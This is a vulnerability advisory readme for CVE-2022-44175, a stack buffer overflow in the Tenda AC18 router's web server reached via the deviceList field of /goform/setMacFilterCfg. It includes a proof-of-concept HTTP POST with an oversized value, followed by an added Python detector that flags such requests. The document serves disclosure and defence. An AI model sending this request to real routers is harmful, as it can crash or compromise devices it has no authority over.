CVE-2022-44175: IoT_vuln/readme.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetMacFilterCfg.

Tenda AC18 (V15.03.05.19) has a Stack Buffer Overflow Vulnerability

Product

  1. product information: https://www.tenda.com.cn/
  2. firmware download: https://www.tenda.com.cn/download/detail-2683.html

Affected version

V15.03.05.19

Vulnerability

The stack overflow vulnerability is in /bin/httpd. The vulnerability occurs in the formSetMacFilterCfg function, which can be accessed through the URL goform/SetMacFilterCfg.

Go to the function sub_C1334

Go to the function sub_C15F8

In the formSetMacFilterCfg function, deviceList is controllable and is eventually passed into the sub_C15F8 function.

The sub_C15F8 function performs no size check, which leads to a stack overflow vulnerability.

PoC

POST /goform/setMacFilterCfg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/iptv.html?random=0.7642888131213508&
Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcmho1qw

macFilterType=1&deviceList=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
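
A defensive check for the request pattern above, as an added example that is not part of the original advisory: it flags POSTs to the affected endpoint whose deviceList value exceeds a length limit. The 512-byte limit, the function names and the sample requests are assumptions constructed for illustration; the page does not state the real buffer size.

```python
from urllib.parse import parse_qs, urlsplit

# Path taken from the advisory; compared case-insensitively because the page
# spells it both "SetMacFilterCfg" and "setMacFilterCfg".
ENDPOINT = "/goform/setmacfiltercfg"
# Assumed threshold: the page does not give the real buffer size, so tune this
# to the longest deviceList seen in legitimate traffic.
MAX_DEVICELIST_LEN = 512


def inspect_request(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP request; an empty list means not flagged."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, _version = parts
    if method != "POST" or urlsplit(target).path.lower() != ENDPOINT:
        return []
    # latin-1 maps each byte to one character, so len() counts decoded bytes
    # even when the value arrives percent-encoded.
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True,
                      encoding="latin-1")
    findings = []
    for value in fields.get("deviceList", []):
        if len(value) > MAX_DEVICELIST_LEN:
            findings.append(
                f"deviceList is {len(value)} bytes, limit {MAX_DEVICELIST_LEN}")
    return findings


def build_request(device_list: str) -> bytes:
    """Build a constructed sample request (not captured traffic)."""
    body = f"macFilterType=1&deviceList={device_list}".encode("latin-1")
    head = ("POST /goform/setMacFilterCfg HTTP/1.1\r\n"
            "Host: 192.168.0.1\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode("latin-1")
    return head + body


if __name__ == "__main__":
    for sample in ("constructed-short-value", "1" * 600):
        print(inspect_request(build_request(sample)) or "not flagged")
```

The same length limit belongs in front of the device's management interface (reverse proxy or IDS rule) until a fixed firmware is installed.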
